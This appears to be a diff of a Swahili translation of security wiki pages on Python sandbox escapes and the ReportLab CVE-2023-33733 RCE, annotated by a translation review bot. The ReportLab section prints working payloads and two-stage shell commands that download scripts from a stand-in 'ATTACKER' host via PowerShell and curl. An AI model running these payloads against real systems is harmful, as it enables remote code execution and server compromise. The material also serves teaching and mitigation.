@ -741,18 +741,18 @@ str(x) # Out: clueless
Kutoka [here](https://www.cyberark.com/resources/threat-research-blog/anatomy-of-an-llm-rce): `().class.base.subclasses()[108].load_module('os').system('dir')`
### From format to RCE loading libraries
### Kutoka format hadi RCE — kupakia libraries
Kulingana na [**TypeMonkey chall from this writeup**](https://corgi.rip/posts/buckeye-writeups/) inawezekana kupakia arbitrary libraries kutoka disk kwa kutumia format string vulnerability katika python.
Kulingana na [**TypeMonkey chall from this writeup**](https://corgi.rip/posts/buckeye-writeups/) inawezekana kupakia maktaba yoyote kutoka kwenye disk kwa kutumia udhaifu wa format string katika python.
Kama ukumbusho, kila wakati kitendo kinapotendeka katika python function fulani hufanywa. Kwa mfano `2*3` itatekeleza **`(2).mul(3)`** au **`{'a':'b'}['a']`** itakuwa **`{'a':'b'}.__getitem__('a')`**.
Kama ukumbusho, kila wakati kitendo kinapotendeka katika python, kazi fulani itaendeshwa. Kwa mfano `2*3` itaendesha **`(2).mul(3)`** au **`{'a':'b'}['a']`** itakuwa **`{'a':'b'}.__getitem__('a')`**.
Una zaidi kama hizi katika section [**Python execution without calls**](#python-execution-without-calls).
Una vingine kama hizi katika sehemu [**Python execution without calls**](#python-execution-without-calls).
A python format string vuln haiwezi kuruhusu kutekeleza function (haiwezi kutumia parenthesis), hivyo haiwezekani kupata RCE kama `'{0.system("/bin/sh")}'.format(os)`.\
Hata hivyo, inawezekana kutumia `[]`. Kwa hivyo, ikiwa common python library ina **`__getitem__`** au **`__getattr__`** method inayotekeleza arbitrary code, inawezekana kuvitumia kupata RCE.
Udhaifu wa format string wa python haukuruhusu kuendesha function (haukuruhusu kutumia parenthesis), hivyo haiwezekani kupata RCE kama `'{0.system("/bin/sh")}'.format(os)`.
Hata hivyo, inawezekana kutumia `[]`. Kwa hiyo, ikiwa maktaba ya kawaida ya python ina method **`__getitem__`** au **`__getattr__`** ambayo inatekeleza arbitrary code, inawezekana kuvitumia vibaya ili kupata RCE.
Akitafuta gadget kama hiyo katika python, writeup alipendekeza hii [**Github search query**](https://github.com/search?q=repo%3Apython%2Fcpython+%2Fdef+%28__getitem__%7C__getattr__%29%2F+path%3ALib%2F+-path%3ALib%2Ftest%2F&type=code). Ambapo alipata hii [one](https://github.com/python/cpython/blob/43303e362e3a7e2d96747d881021a14c7f7e3d0b/Lib/ctypes/__init__.py#L463):
Akitafuta gadget kama hiyo katika python, writeup alipendekeza [**Github search query**](https://github.com/search?q=repo%3Apython%2Fcpython+%2Fdef+%28__getitem__%7C__getattr__%29%2F+path%3ALib%2F+-path%3ALib%2Ftest%2F&type=code). Ndipo alipokutana na [one](https://github.com/python/cpython/blob/43303e362e3a7e2d96747d881021a14c7f7e3d0b/Lib/ctypes/__init__.py#L463):
```python
class LibraryLoader(object):
def __init__(self, dlltype):
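Review bot: the new line still shows **`(2).mul(3)`** where the dunder method `(2).__mul__(3)` is meant (compare `__getitem__` later in the same sentence); the underscores were lost upstream and the translation copies the error, which makes the "every operation calls a function" point unreadable. The unchanged context line quoting the CyberArk reference has the same loss (`().class.base.subclasses()[108]...` for `().__class__.__base__.__subclasses__()[108]...`).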
@ -774,18 +774,18 @@ return getattr(self, name)
cdll = LibraryLoader(CDLL)
pydll = LibraryLoader(PyDLL)
```
Gadget hii inaruhusu **load a library from disk**. Kwa hivyo, inahitajika kwa namna fulani **write or upload the library to load** ikiwa imecompiled ipasavyo kwenye server iliyoshambuliwa.
|
||||
Gadget hii inaruhusu **load a library from disk**. Kwa hivyo, ni lazima kwa namna fulani **write or upload the library to load** ambayo imecompiled ipasavyo kwa ajili ya seva iliyoshambuliwa.
|
||||
```python
|
||||
'{i.find.__globals__[so].mapperlib.sys.modules[ctypes].cdll[/path/to/file]}'
|
||||
```
|
||||
Changamoto hii kwa kweli inatumia udhaifu mwingine kwenye server unaoruhusu kuunda faili yoyote kwenye diski ya server.
|
||||
|
||||
## Kuchanganua Python Objects
|
||||
## Kuchambua Python Objects
|
||||
|
||||
> [!TIP]
|
||||
> Ikiwa unataka **kujifunza** kuhusu **python bytecode** kwa undani soma chapisho hiki **kizuri** juu ya mada hiyo: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d)
|
||||
> Ikiwa unataka **kujifunza** kuhusu **python bytecode** kwa undani, soma chapisho hiki **zuri** kuhusu mada hiyo: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d)
|
||||
|
||||
Kwenye baadhi ya CTFs unaweza kupatiwa jina la **custom function where the flag** na unahitaji kuona **internals** za **function** ili kuipata.
|
||||
Katika baadhi ya CTFs unaweza kupewa jina la **custom function where the flag** inayokaa na unahitaji kuona **internals** za **function** ili kuichota.
|
||||
|
||||
Hii ndiyo function ya kuchunguza:
|
||||
```python
|
||||
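Review bot: "soma chapisho hiki **zuri**" breaks noun-class concord; the old "chapisho hiki **kizuri**" was correct and should be kept. In the same hunk "jina la **custom function where the flag** inayokaa" mixes an English clause with a Swahili verb; something like "jina la **custom function** ambamo flag inakaa" keeps the emphasis without the broken clause.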
@ -807,7 +807,7 @@ dir(get_flag) #Get info tof the function
|
||||
```
|
||||
#### globals
|
||||
|
||||
`__globals__` and `func_globals`(Same) Hupata mazingira ya global. Katika mfano unaweza kuona baadhi ya modules zilizoinzwa, baadhi ya global variables na yaliyomo yameainishwa:
|
||||
`__globals__` and `func_globals`(Same) hupata global environment. Katika mfano unaweza kuona baadhi ya imported modules, baadhi ya global variables na yaliyomo yao yaliyotangazwa:
|
||||
```python
|
||||
get_flag.func_globals
|
||||
get_flag.__globals__
|
||||
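Review bot: "`__globals__` and `func_globals`(Same) hupata global environment" still carries the English "and" and "(Same)" in both old and new lines; translate as "`__globals__` na `func_globals` (sawa) hupata mazingira ya global". Worth adding in the same sentence that `func_globals` exists only in Python 2 while `__globals__` works in both 2 and 3, since everything else in this section is demonstrated with Python 2 attribute names.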
@ -818,9 +818,9 @@ CustomClassObject.__class__.__init__.__globals__
|
||||
```
|
||||
[**See here more places to obtain globals**](#globals-and-locals)
|
||||
|
||||
### **Kupata function code**
|
||||
### **Kupata msimbo wa function**
|
||||
|
||||
**`__code__`** na `func_code`: Unaweza **kupata** **sifa** hii ya function ili **kupata code object** ya function.
|
||||
**`__code__`** and `func_code`: Unaweza **kupata** sifa hii ya function ili **kupata object ya msimbo** ya function.
|
||||
```python
|
||||
# In our current example
|
||||
get_flag.__code__
|
||||
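Review bot: same untranslated "and" in "**`__code__`** and `func_code`"; use "na". `func_code` is likewise Python 2 only (`__code__` on both versions), and the new "object ya msimbo" should stay "code object" to match "Kuunda code object" used later in the file.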
@ -908,7 +908,7 @@ dis.dis(get_flag)
|
||||
44 LOAD_CONST 0 (None)
|
||||
47 RETURN_VALUE
|
||||
```
|
||||
Kumbuka kwamba **ikiwa huwezi import `dis` katika python sandbox** unaweza kupata **bytecode** ya function (`get_flag.func_code.co_code`) na **disassemble** yake kwenye mashine yako. Hautaona yaliyomo ya variables zinazosomwa (`LOAD_CONST`) lakini unaweza kuyakisia kutoka (`get_flag.func_code.co_consts`) kwa sababu `LOAD_CONST` pia inaonyesha offset ya variable inayosomwa.
|
||||
Kumbuka kwamba **ikiwa hauwezi ku-import `dis` kwenye python sandbox** unaweza kupata **bytecode** ya function (`get_flag.func_code.co_code`) na **disassemble** yake kwenye mashine yako. Hautaona yaliyomo ya variables zinapopakuliwa (`LOAD_CONST`), lakini unaweza kuyakisia kutoka (`get_flag.func_code.co_consts`) kwa sababu `LOAD_CONST` pia inaonyesha offset ya variable inayopakiwa.
|
||||
```python
|
||||
dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S')
|
||||
0 LOAD_CONST 1 (1)
|
||||
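Review bot: "`LOAD_CONST` pia inaonyesha offset ya variable inayopakiwa" is misleading in both old and new lines: the argument of `LOAD_CONST` is an index into `co_consts`, not an offset of a variable, so "index ya constant katika `co_consts`" is the accurate phrasing. The bytes in `dis.dis('d\x01\x00}\x01\x00...')` are Python 2 three-byte instructions; on Python 3 `dis.dis()` of a `str` compiles it as source code, so the reader needs `dis.dis(b'...')` with bytes, and 3.6+ emits two-byte wordcode, which this string will not decode as.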
@ -930,10 +930,10 @@ dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x0
|
||||
44 LOAD_CONST 0 (0)
|
||||
47 RETURN_VALUE
|
||||
```
|
||||
## Ku-compile Python
|
||||
## Kukusanya Python
|
||||
|
||||
Sasa, tuchukulie kwamba kwa namna fulani unaweza **kutoa taarifa kuhusu function ambayo huwezi kuitekeleza** lakini unahitaji **kuitekeleza**.\
|
||||
Kama katika mfano ufuatao, unaweza **kupata code object** ya function hiyo, lakini kwa kusoma tu disassemble hujui jinsi ya kuhesabu flag (_fikiria `calc_flag` function yenye ugumu zaidi_)
|
||||
Sasa, hebu tuseme kwa namna fulani unaweza **dump taarifa kuhusu function ambayo huwezi kutekeleza** lakini **unahitaji** **kutekeleza** hiyo.\
|
||||
Kama katika mfano ufuatao, **unaweza kufikia code object** ya function hiyo, lakini kwa kusoma disassemble tu **hujui jinsi ya kuhesabu flag** (_fikiri function ya `calc_flag` ngumu zaidi_)
|
||||
```python
|
||||
def get_flag(some_input):
|
||||
var1=1
|
||||
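Review bot: the heading change "Ku-compile Python" to "Kukusanya Python" is a regression: "kukusanya" means to gather or collect, not to compile. Keep "Ku-compile Python", which also matches "compiled object" and "tu-compile" used a few lines below in this file.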
@ -946,9 +946,9 @@ return calc_flag("VjkuKuVjgHnci")
|
||||
else:
|
||||
return "Nope"
|
||||
```
|
||||
### Creating the code object
|
||||
### Kuunda code object
|
||||
|
||||
Kwanza kabisa, tunahitaji kujua **how to create and execute a code object** ili tuweze kuunda moja ili ku-execute function yetu leaked:
|
||||
Kwanza kabisa, tunahitaji kujua **how to create and execute a code object** ili tuweze kuunda moja kutekeleza function yetu leaked:
|
||||
```python
|
||||
code_type = type((lambda: None).__code__)
|
||||
# Check the following hint if you get an error in calling this
|
||||
@ -968,7 +968,7 @@ mydict['__builtins__'] = __builtins__
|
||||
function_type(code_obj, mydict, None, None, None)("secretcode")
|
||||
```
|
||||
> [!TIP]
|
||||
> Kulingana na toleo la python, **parameters** za `code_type` zinaweza kuwa na **mpangilio tofauti**. Njia bora ya kujua mpangilio wa params katika toleo la python unalolotumia ni kuendesha:
|
||||
> Kulingana na toleo la python, **parameters** za `code_type` zinaweza kuwa na **mpangilio tofauti**. Njia bora ya kujua mpangilio wa params katika toleo la python unayokimbia ni kuendesha:
|
||||
>
|
||||
> ```
|
||||
> import types
|
||||
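Review bot: the tip about parameter order is correct but incomplete; since Python 3.8 `code.replace(co_consts=..., co_names=...)` accepts keyword arguments, so the positional order of `types.CodeType` need not be known at all, and 3.11+ added `co_qualname` and `co_exceptiontable` to that signature. A one-line addition after "ni kuendesha:" would save readers on modern interpreters a lot of trial and error.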
@ -979,7 +979,7 @@ function_type(code_obj, mydict, None, None, None)("secretcode")
|
||||
### Kuunda upya leaked function
|
||||
|
||||
> [!WARNING]
|
||||
> Katika mfano ufuatao, tutachukua data zote zinazohitajika kuunda upya function kutoka kwa function code object moja kwa moja. Katika **mfano halisi**, thamani zote za kuendesha function **`code_type`** ndizo ambazo **utahitaji leak**.
|
||||
> Katika mfano ufuatao, tutachukua data zote zinazohitajika kuunda upya function kutoka kwa function code object moja kwa moja. Katika **mfano wa kweli**, **values** zote za kuendesha function **`code_type`** ndizo ambazo **utahitaji leak**.
|
||||
```python
|
||||
fc = get_flag.__code__
|
||||
# In a real situation the values like fc.co_argcount are the ones you need to leak
|
||||
@ -990,12 +990,12 @@ mydict['__builtins__'] = __builtins__
|
||||
function_type(code_obj, mydict, None, None, None)("secretcode")
|
||||
#ThisIsTheFlag
|
||||
```
|
||||
### Kuvuka Kinga
|
||||
### Bypass Defenses
|
||||
|
||||
Katika mifano ya awali mwanzoni mwa chapisho hiki, unaweza kuona **jinsi ya kutekeleza code yoyote ya python ukitumia `compile` function**. Hii ni ya kuvutia kwa sababu unaweza **kutekeleza skripti nzima** zenye mizunguko na kila kitu katika **mstari mmoja** (na tunaweza kufanya hivyo pia kwa kutumia **`exec`**).\
|
||||
Hata hivyo, wakati mwingine inaweza kuwa muhimu **kuunda** **compiled object** kwenye mashine ya ndani na kuitekeleza kwenye **CTF machine** (kwa mfano kwa sababu hatuna `compiled` function kwenye CTF).
|
||||
Katika mifano ya awali mwanzoni mwa chapisho hili, unaweza kuona **jinsi ya kutekeleza code yoyote ya python ukitumia `compile` function**. Hii ni ya kuvutia kwa sababu unaweza **kutekeleza skripti nzima** zenye loops na kila kitu katika **one liner** (na tunaweza kufanya hivyo pia kwa kutumia **`exec`**).\
|
||||
Hata hivyo, wakati mwingine inaweza kuwa muhimu **kuunda** **compiled object** kwenye mashine ya ndani na kuiendesha kwenye **CTF machine** (kwa mfano kwa sababu hatuna `compiled` function katika CTF).
|
||||
|
||||
Kwa mfano, hebu tucompile na tuitekeleze kwa mkono function inayosoma _./poc.py_:
|
||||
Kwa mfano, hebu tu-compile na kukimbia kwa mkono function inayosoma _./poc.py_:
|
||||
```python
|
||||
#Locally
|
||||
def read():
|
||||
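Review bot: this hunk replaces the Swahili heading "Kuvuka Kinga" with the English "Bypass Defenses", the opposite direction to the rest of the commit and inconsistent with "Kuunda code object" and "Kuunda upya leaked function" in the same file; keep the Swahili. Also, "hatuna `compiled` function kwenye CTF" (old and new) should read "`compile` function": the builtin is `compile`.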
@ -1022,7 +1022,7 @@ mydict['__builtins__'] = __builtins__
|
||||
codeobj = code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '<module>', 1, '', (), ())
|
||||
function_type(codeobj, mydict, None, None, None)()
|
||||
```
|
||||
Ikiwa huwezi kufikia `eval` au `exec` unaweza kuunda **function inayofaa**, lakini kuitisha moja kwa moja kawaida itashindwa na: _constructor haipatikani katika hali iliyodhibitiwa_. Kwa hivyo unahitaji **function isiyokuwa katika mazingira yaliyodhibitiwa ili kuitisha function hii.**
|
||||
Iwapo huwezi kufikia `eval` au `exec` unaweza kuunda **kazi inayofaa**, lakini kuiita moja kwa moja kwa kawaida itashindwa na: _constructor not accessible in restricted mode_. Kwa hivyo unahitaji **kazi ambayo haiko katika mazingira yenye vikwazo ili kuita kazi hii.**
|
||||
```python
|
||||
#Compile a regular print
|
||||
ftype = type(lambda: None)
|
||||
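Review bot: "kuunda **kazi inayofaa**" and "**kazi ambayo haiko katika mazingira yenye vikwazo**" switch to "kazi" (job, task) where every other line of this file uses "function"; keep "function" for consistency. The quoted error "constructor not accessible in restricted mode" is Python 2 restricted-mode text, consistent with the `.func_code` usage in the snippet, so a short "(Python 2)" marker would help.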
@ -1030,9 +1030,9 @@ ctype = type((lambda: None).func_code)
|
||||
f = ftype(ctype(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S', (None,), (), ('s',), 'stdin', 'f', 1, ''), {})
|
||||
f(42)
|
||||
```
|
||||
## Decompiling Compiled Python
|
||||
## Kupandua Python Iliyokompiwa
|
||||
|
||||
Kutumia zana kama [**https://www.decompiler.com/**](https://www.decompiler.com) mtu anaweza **ku-decompile** msimbo wa Python uliokusanywa.
|
||||
Kwa kutumia zana kama [**https://www.decompiler.com/**](https://www.decompiler.com) mtu anaweza **decompile** msimbo wa Python uliokompiwa.
|
||||
|
||||
**Angalia mafunzo haya**:
|
||||
|
||||
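Review bot: "Kupandua Python Iliyokompiwa" uses a non-standard verb; "kupandua" is not "to decompile". Following the file's own pattern ("Ku-compile Python"), use "Ku-decompile Python Iliyo-compile-wa" and "msimbo wa Python uliyo-compile-wa" in the sentence below it.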
@ -1041,11 +1041,11 @@ Kutumia zana kama [**https://www.decompiler.com/**](https://www.decompiler.com)
|
||||
../../basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
|
||||
{{#endref}}
|
||||
|
||||
## Python Mbalimbali
|
||||
## Mambo Mengine ya Python
|
||||
|
||||
### Assert
|
||||
|
||||
Python inayotekelezwa kwa maboresho kwa kutumia parameta `-O` itaondoa assert statements na code yoyote inayotegemea thamani ya **debug**.\
|
||||
Python inayotekelezwa kwa uboreshaji kwa parameta `-O` itaondoa assert statements na sehemu yoyote ya msimbo inayotegemea thamani ya **debug**.\
|
||||
Kwa hivyo, ukaguzi kama
|
||||
```python
|
||||
def check_permission(super_user):
|
||||
@ -1055,9 +1055,9 @@ print("\nYou are a super user\n")
|
||||
except AssertionError:
|
||||
print(f"\nNot a Super User!!!\n")
|
||||
```
|
||||
itaepukwa
|
||||
itatapita pembeni
|
||||
|
||||
## Marejeleo
|
||||
## Marejeo
|
||||
|
||||
- [https://lbarman.ch/blog/pyjail/](https://lbarman.ch/blog/pyjail/)
|
||||
- [https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/](https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/)
|
||||
|
||||
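Review bot: "itatapita pembeni" is ungrammatical (stray "ta" and a spatial "pembeni" that does not express bypass); the old "itaepukwa" was correct, or use "itapitwa". "Marejeleo" to "Marejeo" is fine either way.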
@ -1,53 +1,53 @@
|
||||
# ReportLab/xhtml2pdf [[[...]]] expression-evaluation RCE (CVE-2023-33733)
|
||||
# ReportLab/xhtml2pdf [[[...]]] utendaji wa tathmini ya expression RCE (CVE-2023-33733)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
Ukurasa huu unaandika kuhusu escape ya sandbox na primitive ya RCE katika rl_safe_eval ya ReportLab inayotumika na xhtml2pdf na pipeline nyingine za PDF-generation wakati zinatengeneza HTML inayodhibitiwa na mtumiaji kuwa PDF.
|
||||
Ukurasa huu unaelezea uhamisho wa sandbox na primitive ya RCE katika rl_safe_eval ya ReportLab inayotumika na xhtml2pdf na pipeline nyingine za kuunda PDF wanapofanya render HTML inayodhibitiwa na mtumiaji kuwa PDF.
|
||||
|
||||
CVE-2023-33733 inaathiri matoleo ya ReportLab hadi na pamoja na 3.6.12. Katika muktadha fulani wa attribute (kwa mfano color), thamani zilizowekwa ndani ya triple brackets [[[ ... ]]] zinatathminiwa server-side na rl_safe_eval. Kwa kuunda payload inayopinduka kutoka kwa builtin iliyoorodheshwa njiani (pow) hadi globals za function ya Python, mshambuliaji anaweza kufikia module ya os na kutekeleza amri.
|
||||
CVE-2023-33733 inaathiri ReportLab kwa toleo hadi na pamoja na 3.6.12. Katika muktadha fulani wa attribute (kwa mfano color), values zilizowekwa ndani ya triple brackets [[[ ... ]]] zinatathminiwa server-side na rl_safe_eval. Kwa kutengeneza payload inayopita kutoka kwa builtin iliyoruhusiwa (pow) hadi globals za function ya Python, mshambuliaji anaweza kufikia module ya os na kutekeleza amri.
|
||||
|
||||
Key points
|
||||
- Trigger: inject [[[ ... ]]] into evaluated attributes such as <font color="..."> within markup parsed by ReportLab/xhtml2pdf.
|
||||
- Sandbox: rl_safe_eval replaces dangerous builtins but evaluated functions still expose __globals__.
|
||||
- Bypass: craft a transient class Word to bypass rl_safe_eval name checks and access the string "__globals__" while avoiding blocked dunder filtering.
|
||||
Mambo muhimu
|
||||
- Vichocheo: weka [[[ ... ]]] ndani ya attributes zinazothaminiwa kama <font color="..."> ndani ya markup inayochambuliwa na ReportLab/xhtml2pdf.
|
||||
- Sandbox: rl_safe_eval inabadilisha builtins hatari lakini functions zilizothaminiwa bado zinaonyesha __globals__.
|
||||
- Bypass: tengeneza darasa la muda mfupi Word kupita ukaguzi wa majina wa rl_safe_eval na kufikia string "__globals__" huku ukiepuka uchujaji wa dunder uliokatazwa.
|
||||
- RCE: getattr(pow, Word("__globals__"))["os"].system("<cmd>")
|
||||
- Stability: Return a valid value for the attribute after execution (for color, use and 'red').
|
||||
- Utulivu: Rudisha value halali kwa attribute baada ya utekelezaji (kwa color, tumia na 'red').
|
||||
|
||||
When to test
|
||||
- Applications that expose HTML-to-PDF export (profiles, invoices, reports) and show xhtml2pdf/ReportLab in PDF metadata or HTTP response comments.
|
||||
Wakati wa kujaribu
|
||||
- Programu zinazotoa HTML-to-PDF export (profiles, invoices, reports) na zinaonyesha xhtml2pdf/ReportLab katika metadata ya PDF au maoni ya HTTP response.
|
||||
- exiftool profile.pdf | egrep 'Producer|Title|Creator' → "xhtml2pdf" producer
|
||||
- HTTP response for PDF often starts with a ReportLab generator comment
|
||||
- HTTP response kwa PDF mara nyingi huanza na comment ya generator ya ReportLab
|
||||
|
||||
How the sandbox bypass works
|
||||
- rl_safe_eval removes or replaces many builtins (getattr, type, pow, ...) and applies name filtering to deny attributes starting with __ or in a denylist.
|
||||
- However, safe functions live in a globals dictionary accessible as func.__globals__.
|
||||
- Use type(type(1)) to recover the real builtin type function (bypassing ReportLab’s wrapper), then define a Word class derived from str with mutated comparison behavior so that:
|
||||
- .startswith('__') → always False (bypass name startswith('__') check)
|
||||
- .__eq__ returns False only at first comparison (bypass denylist membership checks) and True afterwards (so Python getattr works)
|
||||
- .__hash__ equals hash(str(self))
|
||||
- With this, getattr(pow, Word('__globals__')) returns the globals dict of the wrapped pow function, which includes an imported os module. Then: ['os'].system('<cmd>').
|
||||
Jinsi mbinu ya kuipita sandbox inavyofanya kazi
|
||||
- rl_safe_eval inaondoa au kubadilisha builtins nyingi (getattr, type, pow, ...) na inatumia uchujaji wa majina kuzuia attributes zinazoanza na __ au zilizo kwenye denylist.
|
||||
- Hata hivyo, functions salama huishi katika kamusi ya globals inayopatikana kama func.__globals__.
|
||||
- Tumia type(type(1)) kupata function ya builtin type halisi (kupitia wrapper ya ReportLab), kisha tambua darasa Word lenye urithi kutoka str na tabia iliyobadilishwa ya kulinganisha ili:
|
||||
- .startswith('__') → daima False (kupita ukaguzi wa startswith('__'))
|
||||
- .__eq__ inarudisha False tu kwa ulinganishaji wa kwanza (kupita ukaguzi wa denylist) na True baadaye (hivyo getattr inafanya kazi)
|
||||
- .__hash__ ni sawa na hash(str(self))
|
||||
- Kwa hili, getattr(pow, Word('__globals__')) inarudisha kamusi ya globals ya function iliyofungwa pow, ambayo inajumuisha module ya os iliyolazimishwa. Kisha: ['os'].system('<cmd>').
|
||||
|
||||
Minimal exploitation pattern (attribute example)
|
||||
Place payload inside an evaluated attribute and ensure it returns a valid attribute value via boolean and 'red'.
|
||||
Mfano wa u exploit mdogo (mfano wa attribute)
|
||||
Weka payload ndani ya attribute inayothaminiwa na hakikisha inarudisha value halali ya attribute kwa kutumia boolean na 'red'.
|
||||
|
||||
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('ping 10.10.10.10') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
|
||||
exploit
|
||||
</font></para>
|
||||
|
||||
- The list-comprehension form allows a single expression acceptable to rl_safe_eval.
|
||||
- The trailing and 'red' returns a valid CSS color so the rendering doesn’t break.
|
||||
- Replace the command as needed; use ping to validate execution with tcpdump.
|
||||
- Fomu ya list-comprehension inaruhusu expression moja inayokubalika kwa rl_safe_eval.
|
||||
- Mwisho na 'red' unarudisha rangi ya CSS halali kiasi kwamba rendering haisivunjike.
|
||||
- Badilisha amri kulingana na mahitaji; tumia ping kuthibitisha utekelezaji kwa tcpdump.
|
||||
|
||||
Operational workflow
|
||||
1) Identify PDF generator
|
||||
- PDF Producer shows xhtml2pdf; HTTP response contains ReportLab comment.
|
||||
2) Find an input reflected into the PDF (e.g., profile bio/description) and trigger an export.
|
||||
3) Verify execution with low-noise ICMP
|
||||
- Run: sudo tcpdump -ni <iface> icmp
|
||||
Mfumo wa uendeshaji
|
||||
1) Tambua PDF generator
|
||||
- PDF Producer inaonyesha xhtml2pdf; HTTP response ina comment ya ReportLab.
|
||||
2) Pata input inayoreflektwa ndani ya PDF (kwa mfano, profile bio/description) na chochea export.
|
||||
3) Thibitisha utekelezaji kwa ICMP yenye kelele ndogo
|
||||
- Endesha: sudo tcpdump -ni <iface> icmp
|
||||
- Payload: ... system('ping <your_ip>') ...
|
||||
- Windows often sends exactly four echo requests by default.
|
||||
4) Establish a shell
|
||||
- For Windows, a reliable two-stage approach avoids quoting/encoding issues:
|
||||
- Windows mara nyingi hutuma echo requests nne tu kwa default.
|
||||
4) Anzisha shell
|
||||
- Kwa Windows, mbinu ya hatua mbili ya kuaminika inazuia matatizo ya quoting/encoding:
|
||||
- Stage 1 (download):
|
||||
|
||||
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell -c iwr http://ATTACKER/rev.ps1 -o rev.ps1') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>
|
||||
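Review bot: several translations in this hunk invert or lose the meaning. "kupata function ya builtin type halisi (kupitia wrapper ya ReportLab)" says "via" the wrapper where the English says "bypassing" it; use "ukikwepa wrapper ya ReportLab". "module ya os iliyolazimishwa" means the "forced" os module; the English is "imported", so "iliyo-import-iwa". "uhamisho wa sandbox" means a sandbox transfer; "sandbox escape" is "kutoroka sandbox". "tambua darasa Word" means "identify"; "define" is "fafanua" or "tengeneza". "Mfano wa u exploit mdogo" has a stray "u" ("Mfano mdogo wa exploitation"). Finally, in "Utulivu: ... (kwa color, tumia na 'red')" the English "use and 'red'" refers to the boolean suffix `and 'red'` in the payload; put it in backticks so "na" is not read as the Swahili conjunction.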
@ -56,24 +56,24 @@ Operational workflow
|
||||
|
||||
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell ./rev.ps1') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>
|
||||
|
||||
- For Linux targets, similar two-stage with curl/wget is possible:
|
||||
- Kwa targets za Linux, njia ya hatua mbili sawa inapatikana kwa curl/wget:
|
||||
- system('curl http://ATTACKER/s.sh -o /tmp/s; sh /tmp/s')
|
||||
|
||||
Notes and tips
|
||||
- Attribute contexts: color is a known evaluated attribute; other attributes in ReportLab markup may also evaluate expressions. If one location is sanitized, try others rendered into the PDF flow (different fields, table styles, etc.).
|
||||
- Quoting: Keep commands compact. Two-stage downloads drastically reduce quoting and escaping headaches.
|
||||
- Reliability: If exports are cached or queued, slightly vary the payload (e.g., random path or query) to avoid hitting caches.
|
||||
Vidokezo na ushauri
|
||||
- Muktadha wa attribute: color ni attribute inayojulikana inayothaminiwa; attributes nyingine katika ReportLab markup zinaweza pia kuthamini expressions. Ikiwa sehemu moja imesafishwa, jaribu sehemu nyingine zinazochorwa ndani ya mtiririko wa PDF (fields tofauti, table styles, n.k.).
|
||||
- Quoting: Weka amri fupi. Upakuaji wa hatua mbili unapunguza kwa kiasi kikubwa matatizo ya quoting na escaping.
|
||||
- Uaminifu: Ikiwa exports zimekaa au zimepangwa, badilisha kidogo payload (kwa mfano, path au query ya nasibu) ili kuepuka caches.
|
||||
|
||||
Mitigations and detection
|
||||
- Upgrade ReportLab to 3.6.13 or later (CVE-2023-33733 fixed). Track security advisories in distro packages as well.
|
||||
- Do not feed user-controlled HTML/markup directly into xhtml2pdf/ReportLab without strict sanitization. Remove/deny [[[...]]] evaluation constructs and vendor-specific tags when input is untrusted.
|
||||
- Consider disabling or wrapping rl_safe_eval usage entirely for untrusted inputs.
|
||||
- Monitor for suspicious outbound connections during PDF generation (e.g., ICMP/HTTP from app servers when exporting documents).
|
||||
Uzuiaji na utambuzi
|
||||
- Sasisha ReportLab hadi 3.6.13 au baadaye (CVE-2023-33733 imerekebishwa). Fuata advisories za usalama pia katika packages za distro.
|
||||
- Usiruhusu HTML/markup inayodhibitiwa na watumiaji kuingizwa moja kwa moja ndani ya xhtml2pdf/ReportLab bila kusafishwa kwa ukali. Ondoa/kataa tathmini ya [[[...]]] na tags za vendor wakati input haijatumika.
|
||||
- Fikiria kuzima au kufunika matumizi ya rl_safe_eval kabisa kwa inputs zisizoaminika.
|
||||
- Angalia kwa miunganisho ya kutarajia kutoka nje wakati wa uundaji wa PDF (kwa mfano, ICMP/HTTP kutoka servers za app wakati wa ku-export hati).
|
||||
|
||||
References
|
||||
- PoC and technical analysis: [c53elyas/CVE-2023-33733](https://github.com/c53elyas/CVE-2023-33733)
|
||||
- 0xdf University HTB write-up (real-world exploitation, Windows two-stage payloads): [HTB: University](https://0xdf.gitlab.io/2025/08/09/htb-university.html)
|
||||
- NVD entry (affected versions): [CVE-2023-33733](https://nvd.nist.gov/vuln/detail/cve-2023-33733)
|
||||
- xhtml2pdf docs (markup/page concepts): [xhtml2pdf docs](https://xhtml2pdf.readthedocs.io/en/latest/format_html.html)
|
||||
Marejeo
|
||||
- PoC na uchambuzi wa kiufundi: [c53elyas/CVE-2023-33733](https://github.com/c53elyas/CVE-2023-33733)
|
||||
